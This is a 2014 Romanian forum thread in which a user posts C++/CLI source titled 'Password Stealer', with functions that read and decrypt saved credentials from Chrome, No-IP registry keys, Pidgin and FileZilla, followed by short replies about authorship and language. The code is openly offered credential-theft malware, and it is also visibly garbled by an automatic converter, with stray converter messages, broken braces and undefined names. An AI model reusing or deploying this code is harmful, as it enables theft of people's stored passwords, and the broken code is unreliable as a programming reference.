[C++] Password Stealer

[M.cod3r]

Google chrome

public:
void StealChrome()
{converted by Instant C++:
        System::String ^cpass = System::String::empty;
        System::String ^datapath = Environment::GetFolderPath(Environment::SpecialFolder::LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Web Data";
        if (File::Exists(datapath))
        {
            SqlClient::SqlConnection ^SQLconnect = gcnew SqlClient::SqlConnection();
            SqlClient::SqlCommand ^SQLcommand = nullptr;
            SQLconnect->ConnectionString = "Data Source=" + datapath + ";";
            SQLconnect->Open();
            SQLcommand = SQLconnect->CreateCommand();
            SQLcommand->CommandText = "SELECT * FROM logins";
            SqlClient::SqlDataReader ^SQLreader = SQLcommand->ExecuteReader();
            System::String ^host = nullptr;
            System::String ^user = nullptr;
            System::String ^pass = nullptr;
            while (SQLreader->Read())
            {
                host = SQLreader["origin_url"];
                user = SQLreader["username_value"];
                pass = Decrypt(SQLreader["password_value"]);
                if ((user != "") & (pass != ""))
                {
                    pss->Text = host;
                    cpass = ("=============================" + System::Environment::NewLine + "Host: " + host + System::Environment::NewLine + "Username: " + user + System::Environment::NewLine + "Password: " + pass + System::Environment::NewLine + "=============================" + System::Environment::NewLine + " ");
                }
            }
            delete SQLcommand;
            SQLconnect->Close();
        }

    }
private:
    [DllImport("Crypt32.dll", SetLastError=true, CharSet=System::Runtime::InteropServices::CharSet::Auto)]
    static bool CryptUnprotectData(DATA_BLOB %pDataIn, System::String ^szDataDescr, DATA_BLOB %pOptionalEntropy, IntPtr pvReserved, CRYPTPROTECT_PROMPTSTRUCT %pPromptStruct, int dwFlags, DATA_BLOB %pDataOut);
    [Flags()]
    private enum class CryptProtectPromptFlags: int
    {
        CRYPTPROTECT_PROMPT_ON_UNPROTECT = 0X1,
        CRYPTPROTECT_PROMPT_ON_PROTECT = 0X2
    };
    [StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
    private value class CRYPTPROTECT_PROMPTSTRUCT
    {
    public:
        int cbSize;
        CryptProtectPromptFlags dwPromptFlags;
        IntPtr hwndApp;
        System::String ^szPrompt;
    };
    [StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
    private value class DATA_BLOB
    {
    public:
        int cbData;
        IntPtr pbData;
    };
public:
    static System::String ^Decrypt(array<System::Byte> ^Datas)
    {
        DATA_BLOB inj = DATA_BLOB();
        DATA_BLOB Ors = DATA_BLOB();
        GCHandle Ghandle = GCHandle::Alloc(Datas, GCHandleType::Pinned);
        inj.pbData = Ghandle.AddrOfPinnedObject();
        inj.cbData = Datas->Length;
        Ghandle.Free();
        DATA_BLOB temppOptionalEntropy1 = DATA_BLOB();
        CRYPTPROTECT_PROMPTSTRUCT temppPromptStruct2 = CRYPTPROTECT_PROMPTSTRUCT();
        CryptUnprotectData(inj, nullptr, temppOptionalEntropy1, System::IntPtr::Zero, temppPromptStruct2, 0, Ors);
        array<System::Byte> ^Returned = gcnew array<System::Byte>(Ors.cbData + 1);
        Marshal::Copy(Ors.pbData, Returned, 0, Ors.cbData);
        System::String ^TheString = Encoding::Default->GetString(Returned);
        return TheString->Substring(0, TheString->Length - 1);
    }
};

No-ip:

public:
System::String ^NoIPSteal()
{
        IpRecord = nullptr;
        System::String ^Username = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Username", nullptr);
        System::String ^Password = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Password", nullptr);
        System::String ^NL = System::Environment::NewLine;
        IpRecord = "===========No-Ip=============" + NL + "Username : " + Username + System::Environment::NewLine + "Password : " + base64Decode(Password) + System::Environment::NewLine + "=============================" + NL;must return a value in C++:
        return nullptr;
    }
private:
System::String ^Base64Dec0de(System::String ^%Base64String)
{
        static array<System::Byte> ^Enc = nullptr;
        array<System::Byte> ^b = nullptr;
        array<System::Byte> ^Out = nullptr;
        int i = 0;
        int j = 0;
        int L = 0;
        array<System::Byte> ^Dec = gcnew array<System::Byte>(256);
        if (Enc->Length == 0) //byval 0&-Ptr = not initialized
        {
            Enc = System::Text::ASCIIEncoding::ASCII->GetBytes("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
        }
        for (i = 0; i <= 255; i++)
        {
        Dec[i] = 64;
        }
        for (i = 0; i <= 63; i++)
        {
        Dec[Enc[i]] = System::Convert::ToByte(i);
        }
        L = Base64String->Length;
        b = System::Text::ASCIIEncoding::ASCII->GetBytes(Base64String);
        Array::Resize(Out, (L / 4) * 3);
        for (i = 0; i <= b->GetUpperBound(0); i += 4)
        {
            Out[j] = System::Convert::ToByte((Dec[b[i]] * 4) | (Dec[b[i + 1]] / 16));
            j = j + 1;
            Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 1]] & 15) * 16 | (Dec[b[i + 2]] / 4));
            j = j + 1;
            Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 2]] & 3) * 64 | Dec[b[i + 3]]);
            j = j + 1;
        }
        if (b[L - 2] == 61)
        {
            j = 2;
        }
        else if (b[L - 1] == 61)
        {
            j = 1;
        }
        else
        {
            j = 0;
        }
        Array::Resize(Out, Out->GetUpperBound(0) - j + 1);
        Base64Dec = System::Text::ASCIIEncoding::ASCII->GetString(Out);must return a value in C++:
        return nullptr;
    } 

Pidgin:

public:
System::String ^PidginSteal()
{
        System::String ^tempPidginSteal = nullptr;
        XmlDocument ^ReadXML = gcnew XmlDocument();
        int i = 0;
        System::Object ^OutAll = nullptr;
        tempPidginSteal = "";
        System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("appdata") + "\\.purple\\accounts.xml";
        if (File::Exists(FilePath) != true)
        {
            return tempPidginSteal;
        }
        else
        {
            try
            {
                ReadXML->Load(FilePath);
                XmlNodeList ^Protocol = ReadXML->GetElementsByTagName("protocol");
                XmlNodeList ^Username = ReadXML->GetElementsByTagName("name");
                XmlNodeList ^Password = ReadXML->GetElementsByTagName("password");
                for (i = 0; i < Protocol->Count; i++)
                {
                    OutAll = OutAll->ToString() + "============Pidgin===========" + System::Environment::NewLine + "Protocol: " + Protocol[i]->InnerText + "\r\n" + "Username: " + Username[i]->InnerText + "\r\n" + "Password: " + Password[i]->InnerText + "\r\n" + System::Environment::NewLine + "=============================" + System::Environment::NewLine;
                }
                tempPidginSteal = OutAll;
            }
            catch (Exception ^ex)
            {
            }
        }
        return tempPidginSteal;
)

Fillezila

public:
System::String ^FileZillaSteal()
{
        System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("APPDATA") + "\\FileZilla\\recentservers.xml";
        System::String ^FileBuffer = Microsoft::VisualBasic::Constants::vbNull;
        System::String ^NL = System::Environment::NewLine;
        FileBuffer = Microsoft::VisualBasic::FileIO::FileSystem::OpenTextFileReader(FilePath)::ReadTo???End();
        System::String ^str = nullptr;
        System::String ^Output = nullptr;
        array<System::String^> ^TempData = nullptr;
        TempData = FileBuffer->Split("\r\n");
        FileBuffer = nullptr;
        for each (System::String ^str in TempData)
        {
            if (str->Contains("</Host>"))
            {
                str->Replace("<Host>", "")->Replace("</Host>", "");
                Output = Output + "Host : " + str + NL;
            }
            if (str->Contains("</User>"))
            {
                str->Replace("<User>", "")->Replace("</User>", "");
                Output = Output + "Username : " + str + NL;
            }
            if (str->Contains("</Pass>"))
            {
                str->Replace("<Pass>", "")->Replace("</Pass>", "");
                Output = Output + "Password : " + str + NL + NL;
            }
        }
        Output = "=============FileZilla================" + System::Environment::NewLine + Output->Replace("<User>", "")->Replace("</User>", "")->Replace("<Host>", "")->Replace("</Host>", "")->Replace("<Pass>", "")->Replace("</Pass>", "") + System::Environment::NewLine + "=============FileZilla================" + System::Environment::NewLine;
        ShoitZilla = Output;must return a value in C++:
        return nullptr;
    }

Edited May 17, 2014 by M.cod3r
!UPDATE.

[vierme32]

Respectele mele daca ii facut de tine.

L.E.:Mai dezamagit: ??? [C++] Password Stealer Codes

Edited May 17, 2014 by vierme32

[nedo]

Salut, te rog sa modifici in titlul topicului din [C++] in [C++/CLI], codul este in varianta de c++ ce este detinuta de microsoft si include componente .net. Nu este c++ curat.

[M.cod3r]

Respectele mele daca ii facut de tine.

L.E.:Mai dezamagit: ??? [C++] Password Stealer Codes

Cu tot respectul nu este f?cut 100% de mine , ! ?i dac? ai observat este o alt? variant? cu totul ?i cu totul diferit? fat? de ce-mi ar??i tu. !

Salut, te rog sa modifici in titlul topicului din [C++] in [C++/CLI], codul este in varianta de c++ ce este detinuta de microsoft si include componente .net. Nu este c++ curat.

Rezolvat !

Edited May 17, 2014 by TheTime
post dublu

[Dorian12]

Aceea?i chestie se putea face in visual basic mult mai u?or ..

[black_death_c4t]

Aceea?i chestie se putea face in visual basic mult mai u?or ..

fa-o